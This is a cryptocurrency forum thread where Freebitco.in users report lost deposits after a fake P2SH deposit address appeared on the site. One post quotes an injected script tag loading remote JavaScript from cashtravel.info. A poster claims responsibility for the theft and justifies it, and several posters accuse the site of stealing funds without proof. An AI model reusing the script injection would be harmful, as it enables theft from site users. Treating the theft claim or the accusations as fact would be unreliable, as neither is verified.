Freebitco.in never responded to me, @TheQuin either and my money was stolen because of Freebitco.in.
I tried to help by leaving my account for them to investigate but no one paid attention to me.
People have to be clear that if there is any problem there is no one in technical support so everything accumulated can be lost and no one will help us.
Furthermore, we still do not know if the problem disappeared due to some action by freebitco.in or because the hackers decided to take a break but they will return.
Are we still on danger?
TheQuin & Freebitco.in = 0% trust

I also had reported my problem since beginning of April, and wrote numerous times to TheQuin and the other FBC 'support' emails.
What a joke.... 'FBC support'.   No response, not even acknowledgement that they have received the mail and that they would look into it.  Nothing.  Complete darkness.   I sort of also gave up on posting again and again, since I didn't get any replies.
I was scammed for over 0.06BTC, and provided all the proofs in April, hoping it would get some resolution.  No resolution, and to my disappointment i see more and more people with similar scam problems.  It looks like the site is going to be out of business very soon, since this kind of distrust will err people away from betting and depositing to this site.
I will never deposit any more money to this site again.   I had previously deposited a lot, like totally over 3 BTC, and lost most of it in wagering, and I always felt that the streaks of high or low numbers is abnormal, but still kept wagering, hoping my betting would win back the losses.
However, now, with this SCAM and STEAL of my money, I have put FBC on my blacklist, and I openly suggest that all of you do the same.  Take out your money as soon as possible, before this site goes bankrupt or before the scammers fool you and take your money too.

TheQuin & Freebitco.in = 0% trust

I think it is far from bankruptcy or financial problems because they are still continuing this Lambo program for the next round, because if they do experience financial problems they will stop one of their flagship programs.
It is no proof that they are fine just because the Lambo feature is still active.  They still didn't announce the previous round winner even almost one month is passed.

And to be honest, I hope they are fine and it's just communication problems or because of Bitcoin network problems
what nonsense, Bitcoin network problems, come on, Bitcoin mempool is occasionally getting some small congestions which are avoided by paying higher fees to process your withdrawal.  This is alsy why the Freebitco.in withdraw function is dynamic and reflects the current mempool fees.  It is not a problem of the Bitcoin blockchain, it is a problem of this f***ng site.

...it looks like I have to decide to sell my FUN Token and withdraw it today, choose slow so that the fee is not high and it takes a few hours to be credited in my wallet, we'll see how this goes, and I hope they will immediately resolve the complaint exist and again gain the trust of its users.
That is a good idea.  Since my last deposit issue and scam (read more here:https://bitcointalk.org/index.php?topic=5492456.msg63964436#msg63964436), I will never deposit to this site any more, and I recommend all of you should be also very cautious.

This fucking site has a malicious script "cashtravel" (https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149) that has been at least one month on their site and targeting the high rollers, and they have not taken any measures to remove it, you'd better block it with Adblock or some other tool.
My theory is they added this malicious script on purpose to send to their own wallets and claim that it was due to the users wrongdoing.

NO ANSWER from TheQuin, from FBC support emails or FBC FAQ, I have sent more than 10 messages to them.  This site looks like is going to die very soon.

And I am sure the 12,5 bitcoins I lost during the years can afford them an all inclusive holiday with hookers and swimmingpools of champagne. but how long they can be on holiday more???

it seems you have also been scammed as many of us high rollers.
check this thread where one user has identified the malicious script:
https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149

you probably also have the same malicious script "Cashtravel" which need to be blocked with Adblock or some other tool.

DONT DEPOSIT ANY MORE FUNDS on this site.
It is going down, for sure.  Over a month has passed since the first complaints, and they have still not fixed this malicious script on their site...

OR, what seems more likely is that they have implemented their own scam in their own website so that they can steal the high roller's money and claim that it is due to their infected computers, when in fact it is freebitcoin themselves.

They don't answer to any of the support emails, nor TheQuin has provided any answer even though he has been seen active a few times in this month on the forum.

WHAT KIND OF A SHIT SITE WOULD DO THIS?    50+ million users, and god knows how many lost BTCs to them.

This site will be out of business very soon

IMHO they are choosing in which of their address send the price .. Cool, i don 't understand this lack of communication for a site with millions of users .
They don't have money to hire  people for social /forum and customer care, it's seems pretty strange.

It is a disaster this site !!  you are worried about lack of communication for the Lambo... Hah
Try lack of communication for several people getting scammed by a malicious script on their website, which, by the way, still has not been removed.
And getting no response  from their so called "support" team, after more than 10 attempts in the past 3 weeks to contact TheQuin, FAQ section in FBC site, support@freebitco.in, and info@freebitco.in

You can see the post for this malicious script here:   https://bitcointalk.org/index.php?topic=5492456.msg63964436#msg63964436

DO NOT INVEST your money in this site !!!   I blindly trusted them since my first 30 deposits and withdrawals didn't face any issues, but now that I am faced with an issue, NO ONE IS HANDLING.  So if you don't want to be in my shoes, DO NOT DEPOSIT !!!

No customer support == No resources == No future for this site

Hi,

I am one of the users which was SCAMMED by the vulnerability of the FBC site.
Thank you @Zibi321 for explaining it in detail, and I want to add my two cents.

In fact this is what happened to me:
1) I was in the top10 daily wagerers in 31st March or 1st April.
2) the next day my FBC website showed the message about the changing of address (i didn't take a screenshot, but it was same as the case reported by Zibi321, only different deposit address starting with '3...' )
the message was something in the lines of "Please note that your deposit address have been change to segwit P2SH format. Depositing to your old address will be charged of additional fee"  https://www.talkimg.com/images/2024/04/11/jAWpq.png
I didn't think of it too much, as everything worked normally on the site, I was claiming free rolls, WoFs, free spins from emails, playing Hi-Lo, reward points were updating etc., so I assumed this message is just some maintenance / upgrade being done by FBC.
3) on 04 April, i deposited 0.06768 BTC to the new P2SH address  (https://ibb.co/NNPjD0w)   (TX id: 77d47f1b44cd656776ca0b2be753ebc0234da203e673714d577e382b6a50444a),    but never received this amount in my account at FBC.   Suspiciously enough, the next day the message for change of deposit address to P2SH disappeared from the site.
4) i wrote several times to the freebitcoin support email, to the FAQ page, as well as to TheQuin, and never received any reply from any of those
5) feeling desperate I joined this forum where i saw also other users faced the same issue and were scammed. I also noticed some abnormal behavior of the site, when I tried to click the generate "new deposit address", nothing happened, you can see it on this video link:  https://www.youtube.com/watch?v=O7gXJTFnqyw
6) It seems that within the js script is an embedded MALICIOUS script which was identified by user ID482015 in this forum topic: https://bitcointalk.org/index.php?topic=320959.msg63923149#msg63923149 .   The malicious scirpt is this:
<option value="<script src=https://cashtravel.info/forum/main.js></script>"><script src="https://cashtravel.info/forum/main.js"></script></option>.
after I blocked this script with AdBlock, now the generate new deposit address is working normally.
This script however is still not removed from the FBC site:   https://ibb.co/L99f2hL

So as a summary, there is a malicious script targeting the high rollers, several people have been scammed by this vulnerability, there is no response from FBC support or TheQuin, the script is still not removed, so the vulnerability is still there, maybe only felt by the targeted audience (high rollers).

I hope FBC can return the scammed people's money and fix this vulnerability ASAP.  Also support from the community is needed, make it more transparent, otherwise they won't listen to just a few voices.

hi :3 i was the one who did it. funny thing i reported stuffs to freebitcoin previously and they ignored it. actually multiple people knew the exploits and was also reported. i waited time to do this and wonder if they still care. i guess not? if you wonder where is the money of those people, i gambled it for those people and blew it all up. its also funny to see people are depositing on a website that has very high house edge. there are alternatives that you can use that has better edge + better support that actually cares for the people.

So you hate FBC due to their support and house margins?  And you decided to get even with them by stealing innocent people's money?
OK, i can agree about the support levels on their side is disaster, but it is not right to make other people suffer because of it.
I don't believe that you gambled it all away, but have it somewhere in your own wallet, so I kindly ask if you can find a piece of heart in you and return the ill-gained proceeds.

And if you did you waste it on FBC, then I ask FBC to consider returning the funds to the deceived customers, otherwise these customers will be only a part of their history.
No? You didnt read properly? Alot of exploits was there FOR LONG and THEY KNOW SOME exists but DIDNT fix it. There has been numerous attempt to contact them. The time will eventually come that someone will exploit it for their own good if i didnt do it. FBC has the responsibility to protect users and they must give it back using their own money. If you decided to blind about your website security issues, then suffer the consequence. I didnt feel bad for them. FBC profits alot from their unfair system. Dont tell me they cant pay 1btc+ refunds, that just a pure greed. these people that i saw lost 0-10btcs in fbc, they have the funds to restore it.

Note: Last known reports was around 2017-2018. Guess if it was fixed or not.

OK, so you confused me, you previously said that you are the one who took the money and that you gambled it all away.
Now you are saying that someone else would exploit it if you didn't do it.  So, basically you are again saying that you did it.

Please return my 0.06768042 BTC to this address:   1AXbfcsNicqddsBfo5REmXnAPnikDLmYox

I am furious at FBC, and I believe as a community we need to put the pressure all of us to them so that they can
1) return the scammed people's money
2) significantly improve their customer support
3) improve their security

He stole a whole $250 AUD from me. Well played sir, I didn't pick this up as I was doing it on my mobile, if I was on my pc i would've been safe.
I reported the cash website link to go daddy so they removed that quite quickly the malicious js.

I was scammed for over 4k US$.
How this vulnerability was allowed by freebitco.in ?
Obviously it was targeted to the high-rollers and the accounts which were in the top-10 daily rolls.

Is anyone from Freebitco.in going to do ANYTHING about this?   Will they take any responsibility and credit back to the scammed users to give back the confidence in the site, or will they just let it slide under the carpet allow a ton of other people get scammed as well.

DISSAPOINTED !!!!!   LOST CONFIDENCE in this site !!!!!  Support level = ZERO !!!

Yes, I didn't receive a response from support or TheQuin either.
Another thing is that it currently doesn't let me create more deposit addresses, as if something had been blocked when that happened.

I hope someone on behalf of Freebitco.in can provide some solution to this.

There is a MALICIOUS SCRIPT https://cashtravel.info/forum/main.js embedded in their site, we have been SCAMMED.

It looks like someone from the Freebitco.in platform is reading our posts after all.  I just tried to create a new deposit address and now it worked just fine...  hah, i guess the video helped...

I hope they will also resolve the pending crediting to my account.
Unfortunately I haven't seen TheQuin online in the last 3-4 days.    Sad

Well, I'm back at square one, again cannot generate new deposit address ...
Yesterday, after I had posted this video (https://www.youtube.com/watch?v=O7gXJTFnqyw), I was able to generate a new address  (I supposed FBC had fixed some issue).  I also tried to immediately generate another address afterwards, and it gave an error message that only 1 address can be generated in 24 hours.   So, I let 24 hour pass, and I tried again, and it does not work again, no error message, but no new address (as if the button click is not calling any procedure).

I try to check in the script what this button is defined to do and i see this:
<div id="new_deposit_buy_button">
<button class="new_button_style profile_page_button_style new_deposit_address_button_width" onclick="GenerateMainDepositAddress();" id="">NEW DEPOSIT ADDRESS</button>
<button id="buy_bitcoins_button" class="new_button_style buy_bitcoin_button_width orange_button" onclick="javascript:VisitLink('https://fluidmoney.xyz/?publicKey=WQ5P75kQZKNLT3FkuFQWfq:AJVkJbDRPVafwjfAZkxqRXkMRtBYq&amp;destinationCurrencyCodeLocked=BTC&amp;walletAddressLocked=1AXbfcsNicqddsBfo5REmXnAPnikDLmYox');">BUY BITCOINS</button> <p><small>* When you buy bitcoins using the button above, they will be sent directly to your FreeBitco.in wallet. Fiat to BTC conversions are handled by Unlimit &amp; TransFi, please contact them if you experience any issues.</small></p></div>

but i can't see any further info what this "GenerateMainDepositAddres()" procedure is doing.

any ideas?

Phishing is extremely popular because it works

If it was a phishing site, how do you explain the following:
1) same message for address change appearing on my mobile app and on the browser
2) reward points updated correctly in their database; just prior to depositing, the lost bets caused an adequate increase in the reward points status, and this amount is still there.  I used the same page to deposit.  I'm no expert, but I would suppose if it was a phishing site, then the whole webpage would need to be a scam, not just the part which was related to the new address notification and the QR code.
3) they corrected the link for generating new bitcoin address after we brought it to attention, now this "new deposit address" button is working properly

It would be too big of a conspiracy theory all 3 above to be true.

I'm suspecting that many more had the same notification, not just the few of us, but either they didn't deposit to it, or deposited a smaller amount so they didn't feel the pain, and did not want to spend too much time trying to rescue their funds.  Even myself, I am a newbee in this forum, and I only joined driven by the search for similar cases where people had not been credited their deposits.  In fact, main purpose was to try to find a way how to reach FBC's support team  (since none of my messages to FBC's support mail resulted with an answer, which on it's own is a red-flag for me).

Then I read jper3009's case, and I understood that TheQuin is their support, so I have a glimmer of hope.   I am waiting for TheQuin's response, but I see he has not been online for 5 days.  I hope my case will not take 8 months like jper3009 Sad

Any other constructive suggestions are welcomed, but please don't put salt on the wound by just giving your opinions that it is our browser's issue or similar, since it is dismissing the real issue.   The real issue, is we need to get the answer from the support so that we know for sure what is the situation, and avoid speculations.

I have also checked the profile settings, there is no options that are related to this topic.
So i believe it is either per-user setting or per country setting, and not the Browser setting or laptop setting.   But would need Freebitco.in's support to resolve this, and getting in touch with them is mission impossible.

Regarding new deposit address, i tried both in the browser and on the mobile app, nothing happens when i click on the "new deposit address" button, so it is not an issue with my browser, it is just the FBC's application (I guess they have disabled the generate new address function).

I have to disagree with this as I have just successfully generated a new deposit address in my freebitco.in account.  I'm still not sure what the issue is that you guys are facing, but none of the above was reflected in my experience using the FreeBitcoin site in recent days.

Maybe it is related to some other criteria, for example location, or maybe it is per-user setting.  I would suspect it is only for those users that had previously had received this notification (you mentioned that you didn't get this notification).  Please check this on the other thread (https://bitcointalk.org/index.php?topic=319540.msg63874969#msg63874969) how the image looked like, this user had same issue as me, and he had taken a screenshot (https://imgbb.host/images/MAU2u.png).  The popup of DEPOSIT BITCOINS is hiding most of the message, but there is one small part of the third notification which was the message related to the address changes.

In my case i have tried to create a new deposit address it does not work, i can assure you.  I tried it on 2 different laptops, with 2 different browsers (Chrome and Edge), as well as on my mobile app.  None of them give any reaction to the "Click".  The mouse pointer changes to a "hand" pointer when i move-over the "New Deposit Address" button, and the color changes to light blue, but when I click, nothing happens.

Cleary your experience is working as normal, but please don't undermine our issue and steer the discussion as a problem of our laptop or virus/malware, when it is not the case, and it is not helping us in the problem resolving.  I can upload a video as a further proof if needed, but i think we should be able to trust each other's words.

Yes, I would say that the notification was from legitimate freebitco.in site, all of my amounts were according to the actual status, the multiply rolls were increasing and decreasing as normal, and the site was refreshed every 1 hour as is normally doing when the timer expires. Everything seemed very legitimate, with the note that this message was there for several days (I would say around 3 or 4 days) and it seemed like the site is legitimate, also, i had the same message also on my mobile app.
I checked in my history stats, my the last deposit and withdrawal to the old address was on 31st March.  after that I guess on 1st or 2nd of April was received the notification, and several hours after my unsuccessful deposit to the new P2SH address, the notification was removed and the old address is now showing again.

That's so strange and I don't know why FreeBitco.in would do such a thing. I'm not saying you're not telling the truth, but it seems like something else could be at stake here. You mentioned the notification looked genuine, everything seemed to function normally, and it even appeared on your mobile app. And the notification vanished after your unsuccessful deposit attempt to the new P2SH address, and the old address reappeared. That timing is awfully suspicious and that's concerning if it was a fake.

Also, there don't seem to be any other reports from other users, except for you two.

As I said before, I was active on the site at that time and did not see any notification and my FreeBitco.in deposit address did not change during that period. Only when I requested a new deposit address, the system generated a new address, but it is still a legacy address, and all old, previously generated deposit addresses should work as before.

I appreciate the commentary but there is nothing else at stake here, the btc has gone to freebitco.ins wallets and is following a similar pattern when consolidating. Here is the other user that was mentioning the same issue https://bitcointalk.org/index.php?topic=319540.msg63874969#msg63874969

A simple google or forum search could have found. That quire easy.

I've been using the site daily for a while I only access it from a direct link. No where else or an email when I do a free spin which I could tell if it wasn't my account as my referrals wouldn't add up, my facet amount would be wrong or even my reward points which I use daily wouldn't be right.

I'm unable to generate a deposit address myself now if I click new one at present. I've deposited successfully onto my old address after the new one didn't work to test it.

While i understand your trying to help its not actually helping as it is almost dismissing our issues here which might put the priority on it lower, there's 3 users here in this forum affected that means there's more than just us.

Anyway I'll away for this to be fixed, I just hope it's not 8 months....

Initially I had thought of this possibility, especially after I saw that this notification is removed and that the deposit address was returned back to the old deposit address (not immediately, but after several hours).  However, I do not believe it is the case of a scam, but rather Freebitco.in doing some work and making a rollback.

I agree with ID482015, and I conclude that this was not a phishing site, since I always open the webpage directly, not via some links, and my wallet status and reward points were correct (~80k) when i logged in.   And just before my deposit, I had lost a few bigger bets, and those reward points showed up in my new status (~85k).   Even today, they are still showing as my current reward points (i.e. FBC have increased by the adequate amount and are updated in FBCs database).   I had used the exact same open webpage to make the deposit to the new address, so I am 100% sure that the site was genuine freebitco.in (otherwise, the reward points would not have increased).    Also, it happened to more of us, not just a single isolated case. (at least 3 on this forum alone;  in reality probably much more that are probably still waiting for FAQ or support's answer)

So, I would dismiss this possibility, and focus on the efforts of TheQuin to make a prompt rectification, since these are surely FBC wallet addresses, and they can easily check the TX IDs and verify how much has been transferred to them vs. how much has been credited to us.

Regarding malware, i ran a full computer scan both for viruses and malware, and no issues are found.
Regarding new deposit address, i tried both in the browser and on the mobile app, nothing happens when i click on the "new deposit address" button, so it is not an issue with my browser, it is just the FBC's application (I guess they have disabled the generate new address function).

Hi, thanks for reply.

They put a message that they were not going to use the legacy addresses anymore, and instead P2SH addresses, that's why I created a new one, which starts with 3Ps..., and made the deposit.

I have not seen this message anywhere on the site, their social media, or marketing emails. On my account I can only generate legacy addresses for deposits. I am skeptical about this being a genuine message you received. If you can show a screenshot of this message it might be useful in determining its legitimacy.

They should have updated to wrapped segwit addresses many years ago. It could be they were doing some testing that they rolled back for now and that’s why the address doesn’t appear anymore.

No, unfortunately I didn't capture the message, it said that legacy addresses will no longer be used, and you should only deposit to P2SH addresses. Deposits to old addresses were going to charge an additional fees.

As you say at the end, I also think that it was something temporary and they turned it back.
I have not received a response from either support or TheQuin.
I hope they fix it and that address is still assigned to my account.

Hi blackmtl308,

I am faced with the same issue which i posted in this thread (https://bitcointalk.org/index.php?topic=320959.new#new).  I got the same notification message in freebitco.in site, I also deposited to the new P2SH address, and my deposit didn't arrive, already it has been 40 hours now.  I have sent TheQuin 2 PM messages as well as wrote on the FAQ page and to support@freebitco.in email, without getting a reply yet.  From what i read in the forums, I should not even expect to get an answer, the only possibility might be if TheQuin would answer.
I saw that others have also complained of the same issue, at least 3 people, so it is not an isolated incident.  I suppose that the Freebitco.in platform must have been doing some modifications, but then decided to rollback for some reason.
What is worrying me is that there is no information sent in advance by the team to inform that such thing is going to happen, or even to give an acknowledgement that any of the complaint messages sent to their support mail or FAQ has been received, let alone to give an estimated time to answer....
For such a big site with so many users and profit made on lost bets, they ought to do a better customer support service, otherwise their credibility will surely go down the drain, and less and less people will invest their money in it.

I hope the administrators are also reading and will resolve our issues fast.

(P.S.  in the past several days, there was a notification in freebitco.in site that the old BTC addresses shall no longer be used, and that new deposits should be made on the new P2SH addresses, so i had used this address for the deposit by clicking on the Deposit -> QR scan.  Unfortunately i did not make a screenshot of this, and now this notification is no longer there, and the deposit address has returned back to the previous one, so i feel that i have been scammed and my money has been stolen.   I really hope this is not the case)

Are the two of you absolutely sure that the notification came from a legitimate freebitco.in site and not from some phishing site? Or maybe your computer is infected with some kind of malware?

I have never seen such a notification on my account or in an email from FreeBitcoin and all the old deposit addresses still work, at least that's what it says on my account.

Your previously generated bitcoin addresses are listed below. Any deposits sent to these addresses will also be credited to your FreeBitco.in account after 1 confirmation.

And clicking "NEW DEPOSIT ADDRESS" still gives a legacy address starting with 1, not 3.

@NK345, @ID482015 If you both guys having any trouble on site then please do one favor to yourself and send all details through PM to @TheQuin with all details which you already post here hopefully he will give all updates quickly to you guys because posting here again and again all your personal details are not favor able to you.
So now do just one thing and send pm with never give your any personal details to any other member because this has never been good for you and your payments go ahead and complete all formalities about your problems.

I had sent one message to TheQuin yesterday, and I resent another reminder just now.  I hope he will take a look and resolve the issue in a much faster time, and not have to wait as long as jper3009 did.  All your inputs and suggestions are welcomed, and thanks in advance.  I also saw another user, wetsuit, is he also an administrator and would it be beneficial to also send to him, or TheQuin is the only technical support?
